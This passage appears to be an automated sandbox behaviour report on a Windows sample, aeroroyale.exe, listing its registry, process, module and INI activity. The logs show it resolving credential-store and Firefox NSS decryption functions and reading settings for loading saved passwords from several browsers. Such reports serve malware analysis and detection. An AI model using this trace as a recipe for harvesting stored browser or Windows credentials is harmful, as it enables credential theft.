| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
| Open Key | Mozilla Firefox 25.0\bin | - |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Read Value | Mozilla Firefox 25.0\bin | value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| Enumerate Keys | - | - |
|
3 | |
| Enumerate Keys | - | - |
|
3 |
Process (32)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | c:\windows\explorer.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskeng.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\respiratory external demands.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\cricket_matched_die.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\ten.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows sidebar\announce ftp graduates.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\locale infected api.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\programme.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\township_heading.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\squirt integral.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft.net\pricing-bhutan-habits.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft sql server\thickness_warcraft.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft sql server\investment institutions lawn.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\steel louise.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\intranet.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\enabling cute glen.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\flowers.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\asks_helpful.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\google\wallace_labs_maximize.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\office15\winword.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 |
Module (73)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x66b50000 |
|
1 | |
| Load | shell32.dll | base_address = 0x760f0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x75c90000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x66b10000 |
|
1 | |
| Load | vaultcli.dll | base_address = 0x66ae0000 |
|
1 | |
| Load | C:\Program Files\Mozilla Firefox\nss3.dll | base_address = 0x63120000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
22 | |
| Get Handle | C:\Program Files\Mozilla Firefox\nss3.dll | base_address = 0x0 |
|
1 | |
| Get Handle | c:\program files\mozilla firefox\nss3.dll | base_address = 0x63120000 |
|
2 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77760000 |
|
1 | |
| Get Filename | - | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x66b56be6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathW, address_out = 0x76110468 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredReadA, address_out = 0x75cd71c1 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredFree, address_out = 0x75c9b2ec |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredDeleteA, address_out = 0x75cd7941 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateA, address_out = 0x75cd7381 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateW, address_out = 0x75cd7481 |
|
1 | |
| Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x66b1526c |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultOpenVault, address_out = 0x66ae26a9 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultCloseVault, address_out = 0x66ae2718 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultEnumerateItems, address_out = 0x66ae3099 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultFree, address_out = 0x66ae4321 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultGetInformation, address_out = 0x66ae24c0 |
|
1 | |
| Get Address | c:\windows\system32\vaultcli.dll | function = VaultGetItem, address_out = 0x66ae3242 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Init, address_out = 0x631dd70b |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = NSS_Shutdown, address_out = 0x631dd13c |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_GetInternalKeySlot, address_out = 0x63173c51 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_FreeSlot, address_out = 0x63173333 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_CheckUserPassword, address_out = 0x6315cbc4 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11_Authenticate, address_out = 0x6315d3ca |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = PK11SDR_Decrypt, address_out = 0x631700a7 |
|
2 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_open, address_out = 0x63281ca0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_prepare, address_out = 0x6320ce70 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_step, address_out = 0x63275200 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_text, address_out = 0x6322d400 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_int, address_out = 0x6322d3a0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_column_int64, address_out = 0x6322d3d0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_finalize, address_out = 0x63259f60 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_close, address_out = 0x6325bde0 |
|
1 | |
| Get Address | c:\program files\mozilla firefox\nss3.dll | function = sqlite3_exec, address_out = 0x6325a270 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessTimes, address_out = 0x7779f626 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
1 |
Ini (28)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = ShowInfoTip, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = ShowTimeInGMT, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsIE, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsChrome, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsOpera, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsSafari, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = LoadPasswordsYandex, default_value = 1 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = UseChromeProfileFolder, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = UseOperaPasswordFile, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = FirefoxProfileFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = FirefoxInstallFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = ChromeProfileFolder |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = OperaPasswordFile |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = SaveFileEncoeding, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = Path, data_out = Profiles/zp0p8bce.default |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = Path |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Mozilla\Firefox\profiles.ini | section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 |
